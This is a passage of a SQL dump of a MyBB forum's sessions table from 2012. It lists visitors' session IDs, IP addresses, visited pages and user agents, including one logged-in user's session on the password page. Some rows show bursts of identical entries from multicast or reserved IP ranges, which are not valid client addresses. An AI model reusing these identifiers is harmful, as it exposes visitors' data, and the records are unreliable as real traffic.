'119.56.76.52', '1352820532', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf181e751361990624eeb4766d5cb027', '0', '178.135.103.214', '1352741582', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3d6e24720bf49d6cbccc3c1fcfe7ab80', '0', '31.185.242.74', '1352746393', '/forumdisplay.php?fid=10', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '10', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ce6098e300a198ad3b0660f24d1faf5f', '0', '195.64.77.128', '1352746719', '/index.php?', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('31daa63fcdc27e6e8356a4e7000985cb', '0', '66.45.50.29', '1352747591', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('589c93e250403ba2e7f89691d94cf85e', '0', '173.245.64.154', '1352747859', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('25eaa0e4922d7c7a906ddd2fd8d9fdad', '0', '86.0.167.238', '1352748358', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('431c3dc99c2610fdb08701eacfd763fd', '0', '192.200.145.148', '1352758114', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ead64576a3331f4cba7944b64eba180', '0', '72.231.24.165', '1352788807', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4d95f37cb1ac41092c94e961f5cebc2f', '0', '38.100.21.63', '1352777802', '/contact.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('42387fc370d956f579f505752ea58076', '0', '59.99.254.53', '1352762592', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('99f844c4a47b696f8a4f2f49f9a4fbcd', '0', '193.200.150.82', '1352749143', '/index.php?', 'http://Anonymouse.org/ (Unix)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7d7bd75a5f64f026ec1dc2d48f3dd136', '0', '103.22.201.11', '1352749480', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('54fb1a0836a1b244d877f04573d02ff3', '0', '174.47.215.254', '1352749649', '/index.php?', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6083b494414e71f2724f07e12d2561ef', '0', '99.104.51.221', '1352752320', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('57d781b914f5dc89563dc02ab1dcbe37', '0', '150.70.64.209', '1352752578', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('79fced592c07e09c374892fcaf910db3', '0', '71.192.17.34', '1352754297', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69dd82a5ee466b1be13d25c0c06daf39', '0', '173.230.141.114', '1352782309', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0657fa309a78cddb98da979fa53319b', '0', '50.23.65.53', '1352758736', '/index.php?', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5e293dfb5bd44dd0d0969e8ff0c38f52', '100', '70.192.22.124', '1352807094', '/usercp.php?action=password', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Versi', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8a15f2c73efc3b5f85df481d426af1ee', '0', '188.126.70.59', '1352759713', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2d64a044f7a806345581b4a759370676', '0', '70.82.232.39', '1352760290', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('80e872975ea2603315d7bc8c81a53f0a', '0', '94.27.79.231', '1352777176', '/member.php?action=register', 'Opera/9.80 (Windows NT 5.1; U; MRA 5.10 (build 5310); ru) Presto/2.10.289 Version/12.00', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('605f68b488b4a2e3f901dc57f3bd942f', '0', '208.80.194.30', '1352762813', '/index.php?', 'Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/5.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bca42c26a88b4d166d190bdf0b4ae6ed', '0', '74.115.4.106', '1352762105', '/~lthackin/index.php?', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('48c86465a07c79a064bb95115e10f084', '0', '96.42.169.220', '1352762226', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9eaccbf7f0cf2d34fae1c43805803b43', '0', '173.245.64.175', '1352762537', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2a6c69e96b64515f1db516f843937cec', '0', '155.213.105.64', '1352771230', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9403473af269c7be263bd726f3a67fa8', '0', '15.172.237.171', '1352771089', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f292313523c68d5e89d381427304322d', '0', '184.170.131.8', '1352767379', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2eb934b2f995d151887e4763016a6d7a', '0', '159.238.12.92', '1352769607', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a8d69eea02390192ab607ddff0589100', '0', '119.154.16.78', '1352769613', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ca5f00e2b1f62700e1921e6d5366451', '0', '100.121.123.151', '1352769613', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8f77e84e40e62692adde2045a9883772', '0', '114.233.83.200', '1352769614', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a8dffc782ef1247578cb267cbadbc33a', '0', '188.116.157.126', '1352769615', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ff72bc18bc900dd87c4d9c3e03f53c0', '0', '241.65.65.164', '1352769615', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('44b7306addc8fcfebeae5dffd02a8305', '0', '213.173.158.101', '1352769618', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('83bed018555bf07eecfe62ec332ef1c5', '0', '82.103.128.63', '1352823589', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dde3cf43f5be39a4fa3618bdc804e84a', '0', '186.80.52.161', '1352769631', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1766aecddf3f5b0260d50a69b4b9c504', '0', '192.90.142.106', '1352769632', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2e23e2d5fc5cfc80434605561ac236d0', '0', '98.137.62.152', '1352769632', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8793e7604e33973cc0096ed493566fd6', '0', '192.129.141.108', '1352769633', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('456475c6ccfa55a54a53e3063e1c7a45', '0', '174.78.225.52', '1352769634', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a25f71bfac444d02e60f440a17e750de', '0', '237.181.41.72', '1352769634', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('517dffe5d9420f3c2e10e6c2f12ceaf2', '0', '136.221.178.72', '1352769640', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b2e24b24160249dfac32f5be0cc8cbb3', '0', '129.32.207.149', '1352769642', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fc7ae587413fd06a6fed67897c3818a9', '0', '103.201.181.101', '1352769643', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('96815ee48e364a406b2dc3466f59648c', '0', '59.11.82.13', '1352769656', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c34e87902c7532cc8f5ff9820e197d1', '0', '110.237.71.97', '1352769659', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cc81fe1a46d29636aabdd6ac097e4e71', '0', '123.14.220.148', '1352769660', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f9bb202f9605adad226c2c04b67b1019', '0', '149.189.213.31', '1352769661', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('194db433b6844e454219934b8c56fb73', '0', '27.84.9.129', '1352769662', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a65bcc92a7250442eb64b20235eea95', '0', '120.104.125.134', '1352769662', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('26553b116383320dc2483a40dddc0d3c', '0', '230.182.13.175', '1352769663', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb51c3243ff390bc03a41650e3941ff5', '0', '214.193.184.4', '1352769665', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5c3eb917a2d24ff7a6d7a432795b5851', '0', '96.47.167.26', '1352769672', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('59119d9150db71095d953b86fb07d35d', '0', '49.188.125.247', '1352769677', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c63b53168af116b878768498b604f25b', '0', '118.211.234.30', '1352769683', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('edb95da4a7de1f6014d0c2347231dfc1', '0', '12.55.4.115', '1352769677', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('91773c81d4709c7f071dfb1ef9907b42', '0', '150.72.112.136', '1352769678', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('82271ecb063d62b3e20f5575b2fe768d', '0', '130.130.150.184', '1352769684', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb7a2f92bf5fdd981a8f0f917a65919c', '0', '201.57.245.88', '1352769686', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e9649f98748365139d58c9ce3ce6cbda', '0', '202.237.194.74', '1352769696', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3efc59044b63d5fb15b44c8525fff277', '0', '129.101.183.176', '1352769691', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d2cdbd91116305ac3a25445a3546d707', '0', '100.21.85.109', '1352769701', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0792e7874b9de851007d60cab47e27f', '0', '164.17.242.236', '1352769702', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0c5e5188629c4db3a9f21ccbcd01b300', '0', '40.172.233.177', '1352769702', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d68c4d8fc5db9e1bb1a113400628a596', '0', '239.28.252.1', '1352769703', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('41dcced05bf02b6c969fb615d9860ae8', '0', '26.20.38.45', '1352769713', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cebb158d0c79f315c08b8d4035c4562f', '0', '154.78.250.30', '1352769715', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('71d9aebf11fd606b7f8a92f06e52ed94', '0', '28.36.140.103', '1352769718', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a8f4077324d902020dcc0306a806273d', '0', '149.113.104.60', '1352769721', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('93e3fe5a8bd1ba4f360dc2e521dba125', '0', '61.109.11.211', '1352769719', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('680102f0c982092f45ec7070f2e21e64', '0', '92.68.204.146', '1352769720', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ff7bfcf962b81d19949f888adaa9ea5d', '0', '228.166.199.4', '1352769720', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b2047f845fb32d93e38f7cdd27287827', '0', '52.28.240.124', '1352769727', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ecf5c94db662faa3e7148e44d0cb47e', '0', '124.35.25.92', '1352769728', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3377c75f126a38310ad2afb5b36bcf48', '0', '68.197.104.186', '1352770138', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.12', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('438730f699ea4224091bd432655c7e3c', '0', '4.128.179.222', '1352770698', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES 